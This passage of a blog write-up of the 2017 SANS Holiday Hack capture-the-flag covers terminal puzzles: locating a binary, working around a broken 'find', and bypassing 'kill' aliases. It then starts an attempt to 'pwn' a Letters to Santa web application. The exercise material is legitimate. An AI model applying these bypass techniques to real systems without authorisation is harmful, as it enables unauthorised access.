&lt;span class="go"&gt;total 0&lt;/span&gt;
&lt;span class="go"&gt;lrwxrwxrwx 1 root root 7 Nov 14 13:48 mail -&amp;gt; ../mail&lt;/span&gt;
&lt;span class="go"&gt;/var/tmp:&lt;/span&gt;
&lt;span class="go"&gt;total 0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If I pipe this output to a &lt;code&gt;grep elftalkd&lt;/code&gt;, we can see that the file
exists:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2849ef63a77a:/$&lt;/span&gt; ls -lR / &lt;span class="p"&gt;|&lt;/span&gt; grep elftalkd
&lt;span class="go"&gt;-rwxr-xr-x 1 root root 7385168 Dec  4 14:29 elftalkd&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;However, we don't have the parent folder. If we look at the full output of
&lt;code&gt;ls -lR&lt;/code&gt;, we can see that it has this form:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;/path/to/folder1&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 file1_in_folder_1&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 file2_in_folder_1&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 file3_in_folder_1&lt;/span&gt;
&lt;span class="go"&gt;/path/to/folder2&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 file1_in_folder_2&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 file2_in_folder_2&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 file3_in_folder_2&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that we have the full path to the parent folder, and then, line by
line, the files contained in this folder. So, if I grep for lines starting
with &lt;code&gt;/&lt;/code&gt;, along with greping for &lt;code&gt;elftalkd&lt;/code&gt;, I'll get an output
like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;/path/to/folder1&lt;/span&gt;
&lt;span class="go"&gt;/path/to/folder2&lt;/span&gt;
&lt;span class="go"&gt;/path/to/elftalkd&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root   52080 Mar  2  2017 elkftalkd&lt;/span&gt;
&lt;span class="go"&gt;/path/to/folder3&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;However, the result will be lost in a list of folders, so I pipe my output
in another &lt;code&gt;grep&lt;/code&gt;, where I look for &lt;code&gt;elkftalkd&lt;/code&gt;. The &lt;code&gt;-B 1&lt;/code&gt;
option tells &lt;code&gt;grep&lt;/code&gt; to print the line before the matching line (which
should be the line with the parent folder to our program):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2849ef63a77a:/$&lt;/span&gt; ls -lR / &lt;span class="p"&gt;|&lt;/span&gt; grep -E &lt;span class="s1"&gt;&amp;#39;^/|elftalkd&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; grep -B &lt;span class="m"&gt;1&lt;/span&gt; elftalkd
&lt;span class="go"&gt;/run/elftalk/bin:&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root 7385168 Dec  4 14:29 elftalkd&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have the full path to our binary, &lt;code&gt;/run/elftalkd/bin/elftalkd&lt;/code&gt;.
We can now launch it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2849ef63a77a:/$&lt;/span&gt; /run/elftalk/bin/elftalkd
&lt;span class="go"&gt;        Running in interactive mode&lt;/span&gt;
&lt;span class="go"&gt;        --== Initializing elftalkd ==--&lt;/span&gt;
&lt;span class="go"&gt;Initializing Messaging System!&lt;/span&gt;
&lt;span class="go"&gt;Nice-O-Meter configured to 0.90 sensitivity.&lt;/span&gt;
&lt;span class="go"&gt;Acquiring messages from local networks...&lt;/span&gt;
&lt;span class="go"&gt;--== Initialization Complete ==--&lt;/span&gt;
&lt;span class="go"&gt;      _  __ _        _ _       _&lt;/span&gt;
&lt;span class="go"&gt;     | |/ _| |      | | |     | |&lt;/span&gt;
&lt;span class="go"&gt;  ___| | |_| |_ __ _| | | ____| |&lt;/span&gt;
&lt;span class="go"&gt; / _ \ |  _| __/ _` | | |/ / _` |&lt;/span&gt;
&lt;span class="go"&gt;|  __/ | | | || (_| | |   &amp;lt; (_| |&lt;/span&gt;
&lt;span class="go"&gt; \___|_|_|  \__\__,_|_|_|\_\__,_|&lt;/span&gt;
&lt;span class="go"&gt;-*&amp;gt; elftalkd! &amp;lt;*-&lt;/span&gt;
&lt;span class="go"&gt;Version 9000.1 (Build 31337)&lt;/span&gt;
&lt;span class="go"&gt;By Santa Claus &amp;amp; The Elf Team&lt;/span&gt;
&lt;span class="go"&gt;Copyright (C) 2017 NotActuallyCopyrighted. No actual rights reserved.&lt;/span&gt;
&lt;span class="go"&gt;Using libc6 version 2.23-0ubuntu9&lt;/span&gt;
&lt;span class="go"&gt;LANG=en_US.UTF-8&lt;/span&gt;
&lt;span class="go"&gt;Timezone=UTC&lt;/span&gt;
&lt;span class="go"&gt;Commencing Elf Talk Daemon (pid=6021)... done!&lt;/span&gt;
&lt;span class="go"&gt;Background daemon...&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="cranberry-pi-the-official-solution"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id20"&gt;Cranberry Pi: the &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;After solving the Cranberry Pi challenge in my (dirty) way, I looked at &lt;a class="reference external" href="https://twitter.com/GreenestElf"&gt;Bushy
Evergreen's twitter profile&lt;/a&gt;.  In &lt;a class="reference external" href="https://twitter.com/GreenestElf/status/938165130906365952"&gt;this
tweet&lt;/a&gt;, he
mentions that someone replaced the &lt;code&gt;find&lt;/code&gt; executable with a wrong
version. Let's take a look at the &lt;code&gt;find&lt;/code&gt; executable on the console:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; which find
&lt;span class="go"&gt;/usr/local/bin/find&lt;/span&gt;
&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; file /usr/local/bin/find
&lt;span class="go"&gt;/usr/local/bin/find: ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-aarch64.so.1, for GNU/Linux 3.7.0, BuildID[sha1]=6ebee1b65b978900b5485&lt;/span&gt;
&lt;span class="go"&gt;2a2d1e698f911064ab3, stripped&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, the &lt;code&gt;find&lt;/code&gt; executable seems to be for an ARM processor. However,
we appear to be running on an Intel x64 processor:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; uname -a
&lt;span class="go"&gt;Linux 2a00576f91ec 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3 (2017-12-03) x86_64 x86_64 x86_64 GNU/Linux&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That's why we got the &lt;code&gt;Exec format error&lt;/code&gt; message when we tried to
execute it: it's not for the right architecture. Let's copy a x64 &lt;code&gt;find&lt;/code&gt;
executable to the machine. To do so, I base64-encoded the &lt;code&gt;find&lt;/code&gt; binary
from my system, pasted it to a file on the Cranberry Pi console, and then
decoded it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAwHIAAAAAAABAAAAAAAAAAAhbAwAAAAAAAAAAAEAAOAAJ&lt;/span&gt;
&lt;span class="go"&gt;AEAAHQAcAAYAAAAFAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAA+AEAAAAAAAD4AQAAAAAAAAgA&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;AAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAADAAAAAAAAAAAAAAAAAAAAAAAAAPxZ&lt;/span&gt;
&lt;span class="go"&gt;AwAAAAAABgEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=&amp;quot; &amp;gt; ~/find.b64&lt;/span&gt;
&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; base64 -d ~/find.b64 &amp;gt; ~/find
&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; chmod +x ~/find
&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; file ~/find
&lt;span class="go"&gt;/home/elf/find: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7079a38abca5fb9d188cc66bb15fb&lt;/span&gt;
&lt;span class="go"&gt;ec5e98f0f00, stripped&lt;/span&gt;
&lt;span class="gp"&gt;elf@2a00576f91ec:~$&lt;/span&gt; ~/find / -name elftalkd &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt; /dev/null
&lt;span class="go"&gt;/run/elftalk/bin/elftalkd&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="redirecting-the-snowball"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id21"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Now that we have completed the challenge, we get a new object to redirect our
snowballs: the Conveyor, that can redirect snowballs.&lt;/p&gt;
&lt;img alt="winter_wonder_landing_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2017/winter_wonder_landing_terminal.png" /&gt;
&lt;p&gt;Here's the layout I used to redirect the snowball to the first page of &lt;em&gt;The
Great Book&lt;/em&gt; (Ok, this is dirty, but I didn't understand that if I clicked on
the conveyor, I could change its direction):&lt;/p&gt;
&lt;img alt="winter_wonder_landing_snowball.gif" class="align-center" src="/images/sans-christmas-challenge-2017/winter_wonder_landing_snowball.gif" /&gt;
&lt;p&gt;We now have the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2017/GreatBookPage1.pdf"&gt;first page to The Great Book&lt;/a&gt;
(sha256: &lt;code&gt;b86eca1fdb8d1fb00c38cebfbca0989579c00b482343dff950310de0f8c77888&lt;/code&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;About This Book...&lt;/p&gt;
&lt;p&gt;This tome is the work of a successive group of anonymous scribes dedicated
to preserving the memory of the exceptional Little People of Oz so that
they'll go down in history. Over a span of several centuries, each author
has striven to capture the most important social, political, and
technological changes the Ozians have experienced from the happy golden
days of yore through today.&lt;/p&gt;
&lt;p&gt;Each and every author is dedicated to the goal of helping future
generations appreciate and understand the unique shared heritage of
merriment, mirth, and magnanimity characteristic of the Little People of
Oz. This book describes the good times they have shared. Also, it does
not shy away from recording the bad times they have suffered as well. Each
writer on this great multi-generational project attempts to record and
present the facts neutrally, without bias or opinion, uninfluenced as much
as possible by factionalism or the controversies of the day.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This North Pole and Beyond level doesn't have a North Pole Christmas Town
infrastructure level associated, so let's move on to the next page.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="second-page-of-the-great-book"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id22"&gt;Second page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now the second page is not in the North Pole and Beyond level, but in the
North Pole Christmas Town infrastructure. But let's solve the NPaB challenge
first.&lt;/p&gt;
&lt;div class="section" id="north-pole-and-beyond-winconceivable-the-cliffs-of-winsanity"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id23"&gt;North Pole and Beyond: Winconceivable: The Cliffs of Winsanity&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="id1"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id24"&gt;Cranberry Pi: Yannick's (dirty) solution&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
                ___,&amp;#64;
               /  &amp;lt;
          ,_  /    \  _,
      ?    \`/______\`/
   ,_(_).  |; (e  e) ;|
    \___ \ \/\   7  /\/    _\8/_
        \/\   \'=='/      | /| /|
         \ \___)--(_______|//|//|
          \___  ()  _____/|/_|/_|
             /  ()  \    `----'
            /   ()   \
           '-.______.-'
   jgs   _    |_||_|    _
        (&amp;#64;____) || (____&amp;#64;)
         \______||______/
My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.

Kill the &amp;quot;santaslittlehelperd&amp;quot; process to complete this challenge.
&lt;/pre&gt;
&lt;p&gt;Ok, we need to kill the &lt;code&gt;santaslittlehelperd&lt;/code&gt; process. Weirdly enough,
the &lt;code&gt;kill&lt;/code&gt; command did not seem to have any effect on the process:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@cc2c61f5d274:~$&lt;/span&gt; ps aux &lt;span class="p"&gt;|&lt;/span&gt; grep santaslittlehelperd
&lt;span class="go"&gt;elf          8  0.0  0.0   4224   684 pts/0    S    17:02   0:00 /usr/bin/santaslittlehelperd&lt;/span&gt;
&lt;span class="go"&gt;elf        163  0.0  0.0  11284   944 pts/0    S+   17:04   0:00 grep --color=auto santaslittlehelperd&lt;/span&gt;
&lt;span class="gp"&gt;elf@cc2c61f5d274:~$&lt;/span&gt; &lt;span class="nb"&gt;kill&lt;/span&gt; -9 &lt;span class="m"&gt;8&lt;/span&gt;
&lt;span class="gp"&gt;elf@cc2c61f5d274:~$&lt;/span&gt; ps aux &lt;span class="p"&gt;|&lt;/span&gt; grep santaslittlehelperd
&lt;span class="go"&gt;elf          8  0.0  0.0   4224   684 pts/0    S    17:02   0:00 /usr/bin/santaslittlehelperd&lt;/span&gt;
&lt;span class="go"&gt;elf        171  0.0  0.0  11284   944 pts/0    S+   17:04   0:00 grep --color=auto santaslittlehelperd&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;However, killing the process in the &lt;code&gt;top&lt;/code&gt; program seemed to work:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;top - 17:05:09 up 2 days,  3:10,  0 users,  load average: 0.05, 0.12, 0.12&lt;/span&gt;
&lt;span class="go"&gt;Tasks:   6 total,   1 running,   5 sleeping,   0 stopped,   0 zombie&lt;/span&gt;
&lt;span class="gp"&gt;%&lt;/span&gt;Cpu&lt;span class="o"&gt;(&lt;/span&gt;s&lt;span class="o"&gt;)&lt;/span&gt;:  &lt;span class="m"&gt;0&lt;/span&gt;.0 us,  &lt;span class="m"&gt;0&lt;/span&gt;.7 sy,  &lt;span class="m"&gt;0&lt;/span&gt;.0 ni, &lt;span class="m"&gt;99&lt;/span&gt;.3 id,  &lt;span class="m"&gt;0&lt;/span&gt;.0 wa,  &lt;span class="m"&gt;0&lt;/span&gt;.0 hi,  &lt;span class="m"&gt;0&lt;/span&gt;.0 si,  &lt;span class="m"&gt;0&lt;/span&gt;.0 st
&lt;span class="go"&gt;KiB Mem : 14782588 total,  5738860 free,  1989032 used,  7054696 buff/cache&lt;/span&gt;
&lt;span class="go"&gt;KiB Swap:        0 total,        0 free,        0 used. 11804040 avail Mem&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Send pid 8 signal [15/sigterm] 9&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND&lt;/span&gt;
&lt;span class="go"&gt;    8 elf       20   0    4224    684    612 S   0.0  0.0   0:00.00 santaslittlehel&lt;/span&gt;
&lt;span class="go"&gt;   11 elf       20   0   13528   6468   1488 S   0.0  0.0   0:00.09 kworker&lt;/span&gt;
&lt;span class="go"&gt;   12 elf       20   0   18248   3336   2848 S   0.0  0.0   0:00.01 bash&lt;/span&gt;
&lt;span class="go"&gt;   18 elf       20   0   71468  26636   9420 S   0.0  0.2   0:00.50 kworker&lt;/span&gt;
&lt;span class="go"&gt;  210 elf       20   0   36672   3124   2660 R   0.0  0.0   0:00.00 top&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id2"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id25"&gt;Cranberry Pi: the &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;After solving the challenge, I checked &lt;a class="reference external" href="https://twitter.com/GlitteryElf"&gt;Sparkle Redberry's Twitter account&lt;/a&gt;.
In &lt;a class="reference external" href="https://twitter.com/GlitteryElf/status/938539753372237824"&gt;this tweet&lt;/a&gt;,
she mentions having problems with a malicious alias. Let's run &lt;code&gt;alias&lt;/code&gt;
on the box to see what's what:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b21389dba617:~$&lt;/span&gt; &lt;span class="nb"&gt;alias&lt;/span&gt;
&lt;span class="go"&gt;alias alert=&amp;#39;notify-send --urgency=low -i &amp;quot;$([ $? = 0 ] &amp;amp;&amp;amp; echo terminal || echo error)&amp;quot; &amp;quot;$(history|tail -n1|sed -e &amp;#39;\&amp;#39;&amp;#39;s/^\s*[0-9]\+\s*//;s/[;&amp;amp;|]\s*alert$//&amp;#39;\&amp;#39;&amp;#39;)&amp;quot;&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;alias egrep=&amp;#39;egrep --color=auto&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;alias fgrep=&amp;#39;fgrep --color=auto&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;alias grep=&amp;#39;grep --color=auto&amp;#39;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;alias kill=&amp;#39;true&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;alias killall=&amp;#39;true&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;alias l=&amp;#39;ls -CF&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;alias la=&amp;#39;ls -A&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;alias ll=&amp;#39;ls -alF&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;alias ls=&amp;#39;ls --color=auto&amp;#39;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;alias pkill=&amp;#39;true&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;alias skill=&amp;#39;true&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ah! There are aliases that prevent us from using &lt;code&gt;kill&lt;/code&gt; and the like,
which explains why our earlier &lt;code&gt;kill&lt;/code&gt; command didn't do anything. We
can redefine the aliases, or directly call the binaries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b21389dba617:~$&lt;/span&gt; which &lt;span class="nb"&gt;kill&lt;/span&gt;
&lt;span class="go"&gt;/bin/kill&lt;/span&gt;
&lt;span class="gp"&gt;elf@b21389dba617:~$&lt;/span&gt; ps aux &lt;span class="p"&gt;|&lt;/span&gt; grep santaslittlehelperd
&lt;span class="go"&gt;elf          8  0.0  0.0   4224   624 pts/0    S    17:29   0:00 /usr/bin/santaslittlehelperd&lt;/span&gt;
&lt;span class="go"&gt;elf        139  0.0  0.0  11284  1024 pts/0    S+   17:31   0:00 grep --color=auto santaslittlehelperd&lt;/span&gt;
&lt;span class="gp"&gt;elf@b21389dba617:~$&lt;/span&gt; /bin/kill -9 &lt;span class="m"&gt;8&lt;/span&gt;
&lt;span class="gp"&gt;elf@b21389dba617:~$&lt;/span&gt; ps aux &lt;span class="p"&gt;|&lt;/span&gt; grep santaslittlehelperd
&lt;span class="go"&gt;elf        148  0.0  0.0  11284   992 pts/0    S+   17:31   0:00 grep --color=auto santaslittlehelperd&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id3"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id26"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Anyway, since we managed to kill the process, we're given a new object: the
Candy Cane, which can redirect the snowball.&lt;/p&gt;
&lt;img alt="winconceivable_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2017/winconceivable_terminal.png" /&gt;
&lt;p&gt;Now here's the layout I used to redirect the snowball:&lt;/p&gt;
&lt;img alt="winconceivable_snowball.gif" class="align-center" src="/images/sans-christmas-challenge-2017/winconceivable_snowball.gif" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-christmas-town-infrastructure-letters-to-santa-application"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id27"&gt;North Pole Christmas Town infrastructure: Letters to Santa application&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The North Pole fine folks host a web application, where all good boys and girls
can send a letter to Santa, requesting their favorite toys:&lt;/p&gt;
&lt;img alt="l2s_application.png" class="align-center" src="/images/sans-christmas-challenge-2017/l2s_application.png" /&gt;
&lt;p&gt;The question specifies that there is a page of &lt;em&gt;The Great Book&lt;/em&gt; at the web root
of the server. Let's see, the name of the first page was
&lt;code&gt;GreatBookPage1.pdf&lt;/code&gt;. Now, what could possibly be the name of this
second page... You guessed it, if you browse directly to the URL
&lt;a class="reference external" href="https://l2s.northpolechristmastown.com/GreatBookPage2.pdf"&gt;https://l2s.northpolechristmastown.com/GreatBookPage2.pdf&lt;/a&gt;, you get direct
access to the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2017/GreatBookPage2.pdf"&gt;second page of The Great Book&lt;/a&gt; (sha256: &lt;code&gt;c4983d87ac8debc02a07d586ea9e43839ba081a426b5c490ceadb830c1cc3d4f&lt;/code&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;On the Topic of Flying Animals&lt;/p&gt;
&lt;p&gt;Originally, only birds could fly in Oz. But, throughout the land, it was
universally recognized that other flying animals would bring great economic
benefits - faster transportation, decreased shipping costs, and a certain
whimsicality that would likely increase tourism. Oz's greatest scientific
minds were tasked with the creation of such beasts. Unfortunately, the
actual development of flying animal species was plagued with unforeseen
difficulties.&lt;/p&gt;
&lt;p&gt;The first attempt, a single flying lion name Moonracer, was deemed a
failure. Although the lion could indeed fly, children responded in abject
terror at his fearsome appearance. The Oz Chamber of Commerce demanded that
scientists choose a species less formidable than a lion.&lt;/p&gt;
&lt;p&gt;Hoping to correct their error, Ozian scientists next grafted wings onto
monkeys, hoping that inherent simian cutenes would prevail. Alas, winged
monkeys proved even more horrific than the flying lion.&lt;/p&gt;
&lt;p&gt;The exasperated scientists then made their third and final attempt - flying
reindeer. Through intense research, they devised an incredible
technological advancement, that would allow reindeer to fly without wings!
It was an unparalleled genetic and aerodynamic achievement.&lt;/p&gt;
&lt;p&gt;Yet, even this advance was accompanied by a slight concern. The
deep-seated genetic alterations introduced to support wingless flight
resulted in an infinitesimally small probability of a significant side
effect: a one-in-a-million chance that a reindeer would one day be born
with a brilliantly shiny red nose. Some of the scientists posited such a
reindeer's nose would even glow. Despite this change, the reserachers
charged ahead to breed an entire herd of such flying reindeer. And, for
centuries, the &amp;quot;red nose&amp;quot; phenomenon was never observed in the wild.&lt;/p&gt;
&lt;p&gt;Although the flying reindeer were a technological marvel and achieved
enormous success in Oz, The Great Schism changed everything. During the
separation negotiations, the Wizard of Oz and Santa Claus both decided that
Moonrancer and the reindeer would be moved to the North Pole, while the
flying monleys would remain in Oz.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now let's try to pwn this application, in order to get access to the internal
network. If we take a look at the source code of the application, we find
something interesting:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;


&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt; &lt;span class="na"&gt;lang&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;en&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;http-equiv&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;X-UA-Compatible&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;IE=edge&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;charset&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf-8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;viewport&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;width=device-width, initial-scale=1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Toys List&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/js/jquery.min.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;link&lt;/span&gt; &lt;span class="na"&gt;rel&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;stylesheet&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/css/materialize.min.css&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/js/materialize.min.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
